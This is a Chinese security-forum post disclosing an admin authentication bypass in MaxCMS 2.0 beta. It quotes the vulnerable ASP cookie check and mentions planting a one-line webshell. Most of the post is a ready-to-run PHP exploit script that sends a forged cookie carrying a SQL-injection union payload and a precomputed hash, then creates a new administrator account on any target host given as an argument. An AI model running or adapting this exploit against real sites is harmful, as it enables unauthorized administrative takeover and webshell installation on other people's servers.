首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞


http://www.gipsky.com/
by flyh4t

http://bbs.wolvez.org/

maxcms后台有自动升级功能,ajax的那个注射被修补了,但是这个漏洞还是没有修补。

在上一贴有同学问是否能绕过认证,答案是肯定的,但是前提是要知道后台目录地址

回顾下漏洞代码



<CODE>Sub checkPower

dim loginValidate,rsObj : loginValidate = "maxcms2.0"

err.clear

on error resume next

set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")

loginValidate = md5(getAgent&getIp&rsObj(0))

if err then wCookie "check"&rCookie("m_username"),"" : die ""

if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die ""

checkManagerLevel rsObj(1)

set rsObj=nothing

End Sub</CODE></PRE>

其中

<CODE>Function rCookie(cookieName)

rCookie = request.cookies(cookieName)

End Function</CODE></PRE>

关键就是这个变量的值 loginValidate = md5(getAgent&getIp&rsObj(0))

通过伪造cookie可以轻松绕过这段认证代码,之后就可以添加新管理员或者修改配置文件插入一句话木马

我这里贴一个添加新管理员的exp



<CODE><?php

print_r('

---------------------------------------------------------------------------

maxcms2.0 creat new admin exploit

by Flyh4t

team:wolvez security team

site:bbs.wolvez.org

dork:salemax#qq.com

---------------------------------------------------------------------------

');



if ($argc < 3) {

print_r('

---------------------------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to maxcms

Example:

php '.$argv[0].' localhost /maxcms2/

---------------------------------------------------------------------------

');

exit;

}



error_reporting(7);

ini_set('max_execution_time', 0);



$host = $argv[1];

$path = $argv[2];

$name = rand(1,10000);

$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';



$resp = send($cmd);

if (!eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}



print_r('

---------------------------------------------------------------------------

[ ]cool,exploit seccuss

[ ]you have add a new adminuser flyh4t'.$name.'/wolvez

---------------------------------------------------------------------------

');





function send($cmd)

{

global $host, $path;

$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: flyh4t\r\n";

$message .= "X-Forwarded-For:1.1.1.1\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Cookie: m_username=flyh4t' union select 663179683474,0 from m_manager where m_username='admin; m_level=0; checkflyh4t' union select 663179683474,0 from m_manager where m_username='admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

echo $message;



$fp = fsockopen($host, 80);

fputs($fp, $message);



$resp = '';



while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

echo $resp;

return $resp;

}

?></CODE></PRE>

<EM></EM>
<< 谷歌手机用户位置追踪 是否带来隐私隐患 Windows XP中不为人知的热键漏洞 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号